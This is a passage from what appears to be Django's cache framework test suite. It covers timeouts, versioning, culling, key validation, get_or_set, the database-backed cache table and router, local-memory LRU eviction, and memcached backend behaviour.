self.assertTrue(cache.has_key('expire1'))
time.sleep(3)
self.assertFalse(cache.has_key('expire1'))
# cache.touch() works without the timeout argument.
cache.set('expire1', 'very quickly', timeout=1)
self.assertIs(cache.touch('expire1'), True)
time.sleep(2)
self.assertTrue(cache.has_key('expire1'))
self.assertIs(cache.touch('nonexistent'), False)
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
with self.subTest(key=key):
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_returns_empty_list_on_success(self):
"""set_many() returns an empty list when all keys are inserted."""
failing_keys = cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(failing_keys, [])
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set_many({'key1': 'spam', 'key2': 'eggs', 'key3': 'ham'})
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
"""
Follow memcached's convention where a timeout greater than 30 days is
treated as an absolute expiration timestamp instead of a relative
offset (#12399).
"""
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
"""
Passing in None into timeout results in a value that is cached forever
"""
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertIs(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
cache.set('key5', 'belgian fries', timeout=1)
cache.touch('key5', timeout=None)
time.sleep(2)
self.assertEqual(cache.get('key5'), 'belgian fries')
def test_zero_timeout(self):
"""
Passing in zero into timeout results in a value that is not cached
"""
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
cache.set('key5', 'belgian fries', timeout=5)
cache.touch('key5', timeout=0)
self.assertIsNone(cache.get('key5'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count += 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def _perform_invalid_key_test(self, key, expected_warning):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with self.assertWarnsMessage(CacheKeyWarning, expected_warning):
cache.set(key, 'value')
finally:
cache.key_func = old_func
def test_invalid_key_characters(self):
# memcached doesn't allow whitespace or control characters in keys.
key = 'key with spaces and 清'
self._perform_invalid_key_test(key, KEY_ERRORS_WITH_MEMCACHED_MSG % key)
def test_invalid_key_length(self):
# memcached limits key length to 250.
key = ('a' * 250) + '清'
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key, 250)
)
self._perform_invalid_key_test(key, expected_warning)
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
# Shouldn't fail silently if trying to cache an unpicklable type.
with self.assertRaises(pickle.PickleError):
cache.add('unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
with self.assertRaises(pickle.PickleError):
cache.set('unpicklable', Unpicklable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
self.assertEqual(cache.get_or_set('null', None), None)
self.assertIsNone(cache.get_or_set('null', 'default'))
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'value')
def test_get_or_set_callable_returning_none(self):
self.assertIsNone(cache.get_or_set('mykey', lambda: None))
# Previous get_or_set() stores None in the cache.
self.assertIsNone(cache.get_or_set('mykey', 'default'))
self.assertIsNone(cache.get('mykey', 'default'))
def test_get_or_set_version(self):
msg = "get_or_set() missing 1 required positional argument: 'default'"
cache.get_or_set('brian', 1979, version=2)
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian')
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
def test_get_or_set_racing(self):
with mock.patch('%s.%s' % (settings.CACHES['default']['BACKEND'], 'add')) as cache_add:
# Simulate cache.add() failing to add a value. In that case, the
# default value should be returned.
cache_add.return_value = False
self.assertEqual(cache.get_or_set('key', 'default'), 'default')
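# Editor's note -- illustrative sketch only, not Django's exact implementation.
# The mock above works because get_or_set() is built on top of add(): when the
# key is missing it tries add(), and if add() fails (e.g. another writer won
# the race) it falls back to a plain get() with the default. Roughly:
#
#   value = cache.get(key)
#   if value is None:
#       if cache.add(key, default):
#           value = default
#       else:
#           value = cache.get(key, default)  # add() lost the race / failed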
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super calls needs to happen first for the settings override.
super().setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super().tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_get_many_num_queries(self):
cache.set_many({'a': 1, 'b': 2})
cache.set('expired', 'expired', 0.01)
with self.assertNumQueries(1):
self.assertEqual(cache.get_many(['a', 'b']), {'a': 1, 'b': 2})
time.sleep(0.02)
with self.assertNumQueries(2):
self.assertEqual(cache.get_many(['a', 'b', 'expired']), {'a': 1, 'b': 2})
def test_delete_many_num_queries(self):
cache.set_many({'a': 1, 'b': 2, 'c': 3})
with self.assertNumQueries(1):
cache.delete_many(['a', 'b', 'c'])
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
out = io.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Use another table name to avoid the 'table already exists' message.
LOCATION='createcachetable_dry_run_mode'
))
def test_createcachetable_dry_run_mode(self):
out = io.StringIO()
management.call_command('createcachetable', dry_run=True, stdout=out)
output = out.getvalue()
self.assertTrue(output.startswith("CREATE TABLE"))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = io.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter:
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
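# Editor's note -- illustrative only: outside of tests, a router such as
# DBCacheRouter is normally listed in settings, either as an instance (as the
# override_settings decorator below does) or by dotted path; the module path
# here is an assumption:
#
#   DATABASE_ROUTERS = ['myproject.routers.DBCacheRouter']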
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
databases = {'default', 'other'}
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable', database='default', verbosity=0)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable', database='other', verbosity=0)
class PicklingSideEffect:
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
self.locked = self.cache._lock.locked()
return {}
limit_locmem_entries = override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
OPTIONS={'MAX_ENTRIES': 9},
))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super().setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
@limit_locmem_entries
def test_lru_get(self):
"""get() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key)
cache.set(9, 9, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key)
for key in range(6, 9):
self.assertIsNone(cache.get(key))
self.assertEqual(cache.get(9), 9)
@limit_locmem_entries
def test_lru_set(self):
"""set() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(3, 9):
cache.set(key, key, timeout=None)
cache.set(9, 9, timeout=None)
for key in range(3, 10):
self.assertEqual(cache.get(key), key)
for key in range(3):
self.assertIsNone(cache.get(key))
@limit_locmem_entries
def test_lru_incr(self):
"""incr() moves cache keys."""
for key in range(9):
cache.set(key, key, timeout=None)
for key in range(6):
cache.incr(key)
cache.set(9, 9, timeout=None)
for key in range(6):
self.assertEqual(cache.get(key), key + 1)
for key in range(6, 9):
self.assertIsNone(cache.get(key))
self.assertEqual(cache.get(9), 9)
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
configured_caches = {}
for _cache_params in settings.CACHES.values():
configured_caches[_cache_params['BACKEND']] = _cache_params
MemcachedCache_params = configured_caches.get('django.core.cache.backends.memcached.MemcachedCache')
PyLibMCCache_params = configured_caches.get('django.core.cache.backends.memcached.PyLibMCCache')
# The memcached backends don't support cull-related options like `MAX_ENTRIES`.
memcached_excluded_caches = {'cull', 'zero_cull'}
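# Editor's note -- illustrative only: for MemcachedCache_params or
# PyLibMCCache_params above to be populated, the test settings file must define
# a matching backend; the host/port below are assumptions:
#
#   CACHES = {
#       'default': {
#           'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
#           'LOCATION': '127.0.0.1:11211',
#       },
#   }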
class BaseMemcachedTests(BaseCacheTests):
# By default it's assumed that the client doesn't clean up connections
# properly, in which case the backend must do so after each request.
should_disconnect_on_close = True
def test_location_multiple_servers(self):
locations = [
['server1.tld', 'server2:11211'],
'server1.tld;server2:11211',
'server1.tld,server2:11211',
]
for location in locations:
with self.subTest(location=location):
params = {'BACKEND': self.base_params['BACKEND'], 'LOCATION': location}
with self.settings(CACHES={'default': params}):
self.assertEqual(cache._servers, ['server1.tld', 'server2:11211'])
def test_invalid_key_characters(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
# when using the ascii protocol.
with self.assertRaises(Exception):
cache.set('key with spaces', 'value')
def test_invalid_key_length(self):
# memcached limits key length to 250
with self.assertRaises(Exception):
cache.set('a' * 251, 'value')
def test_default_never_expiring_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
TIMEOUT=None)):
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
def test_default_far_future_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
# 60*60*24*365, 1 year
TIMEOUT=31536000)):
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
# pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
# tell from a quick check of its source code. This is falling back to
# the default value exposed by python-memcached on my system.
max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
try:
cache.set('small_value', large_value)
except Exception:
# Some clients (e.g. pylibmc) raise when the value is too large,
# while others (e.g. python-memcached) intentionally return True
# indicating success. This test is primarily checking that the key
# was deleted, so the return/exception behavior for the set()
# itself is not important.
pass
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
def test_close(self):
# For clients that don't manage their connections properly, the
# connection is closed when the request is complete.
signals.request_finished.disconnect(close_old_connections)
try:
with mock.patch.object(cache._lib.Client, 'disconnect_all', autospec=True) as mock_disconnect:
signals.request_finished.send(self.__class__)
self.assertIs(mock_disconnect.called, self.should_disconnect_on_close)
finally:
signals.request_finished.connect(close_old_connections)
def test_set_many_returns_failing_keys(self):
def fail_set_multi(mapping, *args, **kwargs):
return mapping.keys()
with mock.patch('%s.Client.set_multi' % self.client_library_name, side_effect=fail_set_multi):
failing_keys = cache.set_many({'key': 'value'})
self.assertEqual(failing_keys, ['key'])
@unittest.skipUnless(MemcachedCache_params, "MemcachedCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
))
class MemcachedCacheTests(BaseMemcachedTests, TestCase):
base_params = MemcachedCache_params
client_library_name = 'memcache'
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key in settings.CACHES:
with self.subTest(cache_key=cache_key):
self.assertEqual(caches[cache_key]._cache.pickleProtocol, pickle.HIGHEST_PROTOCOL)
